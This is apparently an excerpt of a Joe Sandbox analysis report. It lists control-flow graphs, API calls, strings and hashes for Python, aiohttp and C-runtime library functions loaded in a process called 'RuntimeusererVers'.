                                                                                                                                                                                                                                          control_flow_graph 4928 7ff81ec82310-7ff81ec82362 PyDict_Next 4929 7ff81ec82368 4928->4929 4930 7ff81ec824b3-7ff81ec824c5 4928->4930 4931 7ff81ec82370-7ff81ec8237e 4929->4931 4932 7ff81ec82399-7ff81ec823aa 4931->4932 4933 7ff81ec82380 4931->4933 4935 7ff81ec824fa-7ff81ec82512 PyErr_Format 4932->4935 4936 7ff81ec823b0-7ff81ec823b3 4932->4936 4934 7ff81ec82383-7ff81ec82386 4933->4934 4938 7ff81ec8238c-7ff81ec82397 4934->4938 4939 7ff81ec82462-7ff81ec82472 4934->4939 4937 7ff81ec82518-7ff81ec8252d 4935->4937 4940 7ff81ec8240a-7ff81ec8240d 4936->4940 4941 7ff81ec823b5 4936->4941 4938->4932 4938->4934 4942 7ff81ec82493-7ff81ec824ad PyDict_Next 4939->4942 4944 7ff81ec8240f 4940->4944 4945 7ff81ec82459-7ff81ec82460 4940->4945 4943 7ff81ec823c0-7ff81ec823c6 4941->4943 4942->4930 4942->4931 4946 7ff81ec823cc-7ff81ec823d4 4943->4946 4947 7ff81ec82474-7ff81ec8248d 4943->4947 4948 7ff81ec82410-7ff81ec82419 4944->4948 4949 7ff81ec824cd-7ff81ec824f9 PyErr_Format 4945->4949 4950 7ff81ec823fd-7ff81ec82408 4946->4950 4951 7ff81ec823d6-7ff81ec823e3 PyUnicode_Compare 4946->4951 4947->4940 4947->4942 4952 7ff81ec8241f-7ff81ec82427 4948->4952 4953 7ff81ec824c6 4948->4953 4950->4940 4950->4943 4954 7ff81ec823e5-7ff81ec823ee PyErr_Occurred 4951->4954 4955 7ff81ec823f4-7ff81ec823fb 4951->4955 4956 7ff81ec82429-7ff81ec82436 PyUnicode_Compare 4952->4956 4957 7ff81ec82450-7ff81ec82457 4952->4957 4953->4949 4954->4937 4954->4955 4955->4947 4955->4950 4958 7ff81ec82438-7ff81ec82441 PyErr_Occurred 4956->4958 4959 7ff81ec82447-7ff81ec8244e 4956->4959 4957->4945 4957->4948 4958->4937 4958->4959 4959->4953 4959->4957
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$CompareDict_FormatNextOccurredUnicode_
                                                                                                                                                                                                                                          • String ID: %.200s() keywords must be strings$%s() got an unexpected keyword argument '%U'$%s() got multiple values for keyword argument '%U'$_websocket_mask_cython
                                                                                                                                                                                                                                          • API String ID: 2724850958-268793784
                                                                                                                                                                                                                                          • Opcode ID: ec09a6d48d216784302187176dcc5726856883a7d3e28b205bb870558ab9b005
                                                                                                                                                                                                                                          • Instruction ID: 3a6eb6674a90bc6684ab4bc4f8d0fddef8086fe7458e94bd3f4152186e9947f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec09a6d48d216784302187176dcc5726856883a7d3e28b205bb870558ab9b005
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03519C32B29F4681EB088B55EA44AB863A6FB94FE4F155236CE5D47364EF3CF8458310

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4960 7ff81df2f8e0-7ff81df2f906 4961 7ff81df2f90c-7ff81df2f931 4960->4961 4962 7ff81df2fbc2 4960->4962 4961->4962 4963 7ff81df2f937-7ff81df2f951 4961->4963 4964 7ff81df2fbc4-7ff81df2fbdc 4962->4964 4965 7ff81df2f96f-7ff81df2f978 calloc 4963->4965 4966 7ff81df2f953-7ff81df2f96d memset 4963->4966 4967 7ff81df2f97b-7ff81df2f97e 4965->4967 4966->4967 4967->4962 4969 7ff81df2f984-7ff81df2f9bb call 7ff81deeacb0 4967->4969 4972 7ff81df2f9bd-7ff81df2f9c4 4969->4972 4973 7ff81df2f9c6-7ff81df2f9e7 call 7ff81dee25c0 4969->4973 4974 7ff81df2f9ea-7ff81df2fa14 4972->4974 4973->4974 4977 7ff81df2fa2f-7ff81df2fa38 calloc 4974->4977 4978 7ff81df2fa16-7ff81df2fa2d memset 4974->4978 4979 7ff81df2fa3b-7ff81df2fa3e 4977->4979 4978->4979 4981 7ff81df2fa4a-7ff81df2fa4f 4979->4981 4982 7ff81df2fa40-7ff81df2fa48 4979->4982 4983 7ff81df2fa75-7ff81df2fafb call 7ff81df2e450 call 7ff81df2e960 call 7ff81df2e450 4981->4983 4984 7ff81df2fa51 4981->4984 4982->4983 4992 7ff81df2fafd-7ff81df2fb00 4983->4992 4993 7ff81df2fb02-7ff81df2fb12 EnterCriticalSection LeaveCriticalSection 4983->4993 4985 7ff81df2fa55-7ff81df2fa73 InitializeCriticalSection InitializeConditionVariable 4984->4985 4985->4983 4985->4985 4994 7ff81df2fb18-7ff81df2fbb8 memset InitializeCriticalSection InitializeConditionVariable InitializeCriticalSection InitializeConditionVariable 4992->4994 4993->4994 4995 7ff81df2fbba-7ff81df2fbbd call 7ff81df2fe20 4994->4995 4996 7ff81df2fbdd-7ff81df2fbe0 4994->4996 4995->4962 4996->4964
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize$CriticalSectionmemset$ConditionVariable$calloc$EnterLeave
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1359542211-0
                                                                                                                                                                                                                                          • Opcode ID: 97906e486ffb2ddf58f8d1d66976afe481b09cf9a0ac9c135b6df8103ec10d42
                                                                                                                                                                                                                                          • Instruction ID: eb07ce413c02f180a02c85775828724b1a2cc937839ca5a34eeb9a005dd1d100
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97906e486ffb2ddf58f8d1d66976afe481b09cf9a0ac9c135b6df8103ec10d42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37819023A18E86D6EB19CF25A4512AA73A0FF887D4F044235DB8F47651EF3CE6A5C700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4998 7ff81ec826a0-7ff81ec826d2 PyObject_GetAttrString 4999 7ff81ec826d8-7ff81ec826e3 4998->4999 5000 7ff81ec82790 4998->5000 5001 7ff81ec82708-7ff81ec8270f 4999->5001 5002 7ff81ec826e5-7ff81ec82706 PyErr_Format 4999->5002 5003 7ff81ec82792-7ff81ec827ac call 7ff81ec82c80 5000->5003 5005 7ff81ec8273e 5001->5005 5006 7ff81ec82711-7ff81ec8273c PyErr_Format 5001->5006 5004 7ff81ec82781-7ff81ec82785 5002->5004 5004->5000 5010 7ff81ec82787-7ff81ec8278a _Py_Dealloc 5004->5010 5008 7ff81ec827ad-7ff81ec827b0 5005->5008 5009 7ff81ec82740-7ff81ec8277f PyOS_snprintf PyErr_WarnEx 5005->5009 5006->5004 5008->5003 5009->5004 5009->5008 5010->5000
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format$AttrDeallocObject_String
                                                                                                                                                                                                                                          • String ID: %.200s.%.200s is not a type object$%.200s.%.200s size changed, may indicate binary incompatibility. Expected %zd from C header, got %zd from PyObject$%s.%s size changed, may indicate binary incompatibility. Expected %zd from C header, got %zd from PyObject$builtins
                                                                                                                                                                                                                                          • API String ID: 808083611-401325408
                                                                                                                                                                                                                                          • Opcode ID: 1f4596f3a247802157975afbe54c4fa5e66e589e69acb363bea2f9bfedec8d83
                                                                                                                                                                                                                                          • Instruction ID: d3c81ecaa5f362a71c907b4c9580e3f6f5309f4c608dd49e61bd72621e76e3de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f4596f3a247802157975afbe54c4fa5e66e589e69acb363bea2f9bfedec8d83
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61313C31A28F5281EB248B11EE44AA9A3A1FF88BF4F414636D98D47664DF3CF544C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638693744.00007FF81EC61000.00000020.00000001.01000000.0000006F.sdmp, Offset: 00007FF81EC60000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638664892.00007FF81EC60000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638782154.00007FF81EC62000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638844829.00007FF81EC64000.00000002.00000001.01000000.0000006F.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec60000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: 5d72e879cf7946976a5814a50ab2a295b69da044195d469edd6d5210a35643fb
                                                                                                                                                                                                                                          • Instruction ID: 6a25615080e37dc4acab4ffa221311253c561820c0309b00e8b28e3a11ec5551
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d72e879cf7946976a5814a50ab2a295b69da044195d469edd6d5210a35643fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01816E21E2CA4346FB549F66BC412BB62E1AFCD7E2F044335EA0D87796DE2CF8458600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: 423331a2c39e25c209e8438f0d99a820b16d34edfd58e6d039228df5ef57337c
                                                                                                                                                                                                                                          • Instruction ID: 5de5b661736f31b0c7f95ca129e23db49c54ecbcb2990d5c509e55dfc6aace30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423331a2c39e25c209e8438f0d99a820b16d34edfd58e6d039228df5ef57337c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3816C21F28E4B86F750AB6A9C492B962D0AFF57E0F544735E90F87796DF2CF8418600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638905947.00007FF81EC71000.00000020.00000001.01000000.0000006E.sdmp, Offset: 00007FF81EC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638872780.00007FF81EC70000.00000002.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638949902.00007FF81EC72000.00000002.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639016964.00007FF81EC73000.00000004.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639056414.00007FF81EC74000.00000002.00000001.01000000.0000006E.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: d573cd7bf0bafa259f49a36843b2703105abc7edda614b8f92858340699d7a94
                                                                                                                                                                                                                                          • Instruction ID: a9cd37abcea172b266d0b9b11a79525e074a61defb64780d795083e4fe83eb43
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d573cd7bf0bafa259f49a36843b2703105abc7edda614b8f92858340699d7a94
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7815E61E3CA4346F754AB669CC22B926E2AFC5BE0F144335EA4DC7796DE2CF8458600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: 7de1196d3394e08d81985672677c6a629fb10ef14ac0565d7f0cdabffa975e24
                                                                                                                                                                                                                                          • Instruction ID: 2f86fe82eee84e33d8e620df65f7e1eb989ac6cf8bc094d1d7cdb4774f48f59a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7de1196d3394e08d81985672677c6a629fb10ef14ac0565d7f0cdabffa975e24
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6481A060E3CE4346F7589B699E45AB966D2BF95BE0F045335E90D477A6DF3CF8028200
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_String$Item$Tuple_$Pack$FromLongLong_$Dealloc$Object_SizeUnicode_$AttrCallCode_EmptyErr_Fetch
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2217525345-0
                                                                                                                                                                                                                                          • Opcode ID: 1752a3f49b0f0487f841e5135dab3343f20982d458e3b190c02c5a0d2175f4c0
                                                                                                                                                                                                                                          • Instruction ID: fe4d9c9711959cdf777ba1e6b6b3f01d95d8e5599f649992ea58bbf2b76a2a16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1752a3f49b0f0487f841e5135dab3343f20982d458e3b190c02c5a0d2175f4c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E515A74A2AF0281EB159B59BC542A533A5FF88BE0F44537AD98D073A4EF3DF6618340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_$Err_FormatHashItem_Known$Size
                                                                                                                                                                                                                                          • String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$_websocket_mask_cython$aiohttp._websocket._websocket_mask_cython$exactly
                                                                                                                                                                                                                                          • API String ID: 742021863-782616090
                                                                                                                                                                                                                                          • Opcode ID: fa3c9ec0253440b82388672cbaf99f3bbb1e0c3b5909f04a064cfbc31425cbd4
                                                                                                                                                                                                                                          • Instruction ID: a328f26429b80a22bfcb752b50e48d9737d84b84218ad203829c00f89433f77a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa3c9ec0253440b82388672cbaf99f3bbb1e0c3b5909f04a064cfbc31425cbd4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B410075A28F4681EB248B15EE4096AA3E4FB89BE0F540236DE8D07B55DF3CF591C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF81DEE25AD), ref: 00007FF81DEE260C
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF81DEE25AD), ref: 00007FF81DEE2618
                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF81DEE25AD), ref: 00007FF81DEE2668
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF81DEE25AD), ref: 00007FF81DEE2674
                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32 ref: 00007FF81DEE269A
                                                                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32 ref: 00007FF81DEE26A7
                                                                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32 ref: 00007FF81DEE26B4
                                                                                                                                                                                                                                          • memset.VCRUNTIME140 ref: 00007FF81DEE26F1
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF81DEE26FD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF81DEE2780), ref: 00007FF81DEE27AF
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: LeaveCriticalSection.KERNEL32 ref: 00007FF81DEE27C3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: WakeAllConditionVariable.KERNEL32 ref: 00007FF81DEE27D0
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: WakeAllConditionVariable.KERNEL32 ref: 00007FF81DEE27DD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: WaitForSingleObject.KERNEL32 ref: 00007FF81DEE2815
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: CloseHandle.KERNEL32 ref: 00007FF81DEE2820
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: GetLastError.KERNEL32 ref: 00007FF81DEE282E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: DeleteCriticalSection.KERNEL32 ref: 00007FF81DEE284B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConditionCriticalSectionVariable$Initializecallocmemset$Wake$CloseDeleteEnterErrorHandleLastLeaveObjectSingleWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 708475683-0
                                                                                                                                                                                                                                          • Opcode ID: bb3fcba4a768b6f5dfd495e022c2bc2d456dfefaf024495bd1f501c25eca83fd
                                                                                                                                                                                                                                          • Instruction ID: a081bb44ca922e19658c318c9dc7ed394d58fdc172dd59397c7d3f8f1aef5594
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb3fcba4a768b6f5dfd495e022c2bc2d456dfefaf024495bd1f501c25eca83fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A517C33A15F568AEB458F25E84036A63A5FF89BD5F044235DE4E07BA9EF38D441C360
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ConditionVariablememset$DeleteSleepWakefreemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2005627279-0
                                                                                                                                                                                                                                          • Opcode ID: 5b5cf4217db0e87d0dbf6b2d27dc5cd07cde69938fb8ec553d79b0705bf93a69
                                                                                                                                                                                                                                          • Instruction ID: a567800052566bac949ded41aae74a5c15cdf3e63edede4ac0ba535a619dd639
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b5cf4217db0e87d0dbf6b2d27dc5cd07cde69938fb8ec553d79b0705bf93a69
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9126E23A18B8597E6298F28E5103B9B360FB99794F159335DB9E13651EF38F2E4C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmpDownload File
